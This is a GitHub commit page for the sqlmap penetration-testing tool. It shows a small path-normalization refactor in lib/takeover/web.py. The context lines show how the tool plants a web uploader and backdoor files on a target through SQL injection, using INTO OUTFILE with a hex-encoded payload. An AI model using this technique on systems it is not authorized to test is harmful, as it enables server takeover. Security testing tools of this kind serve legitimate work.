Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 5654330

Browse files
stamparmstamparm
committed
used normalizePath instead of os.path.normalize
1 parent 494e014 commit 5654330

1 file changed

Lines changed: 8 additions & 4 deletions

File tree

lib/takeover/web.py

Lines changed: 8 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -31,6 +31,7 @@
3131
from lib.core.common import fileToStr
3232
from lib.core.common import getDirs
3333
from lib.core.common import getDocRoot
34+
from lib.core.common import normalizePath
3435
from lib.core.common import readInput
3536
from lib.core.convert import hexencode
3637
from lib.core.data import conf
@@ -96,7 +97,7 @@ def __webFileStreamUpload(self, stream, destFileName, directory):
9697

9798
elif self.webApi == "asp":
9899
backdoorRemotePath = "%s/%s" % (directory, destFileName)
99-
backdoorRemotePath = os.path.normpath(backdoorRemotePath)
100+
backdoorRemotePath = normalizePath(backdoorRemotePath)
100101
backdoorContent = stream.read()
101102
postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
102103
page, _ = Request.getPage(url=self.webUploaderUrl, direct=True, post=postStr)
@@ -164,16 +165,19 @@ def webInit(self):
164165

165166
for directory in directories:
166167
# Upload the uploader agent
167-
outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
168+
169+
outFile = normalizePath("%s/%s" % (directory, uploaderName))
168170
uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
169171
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
170172
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
171173
query = agent.prefixQuery(" %s" % query)
172174
query = agent.postfixQuery(query)
173175
payload = agent.payload(newValue=query)
174176
page = Request.queryPage(payload)
175-
176-
requestDir = os.path.normpath(directory.replace(kb.docRoot, "/").replace("\\", "/"))
177+
178+
requestDir = normalizePath(directory.replace(kb.docRoot, "/").replace("\\", "/"))
179+
if re.search("\A[A-Za-z]:", requestDir):
180+
requestDir = requestDir[2:]
177181
self.webBaseUrl = "%s://%s:%d%s" % (conf.scheme, conf.hostname, conf.port, requestDir)
178182
self.webUploaderUrl = "%s/%s" % (self.webBaseUrl, uploaderName)
179183
self.webUploaderUrl = self.webUploaderUrl.replace("./", "/").replace("\\", "/")

0 commit comments

Comments
 (0)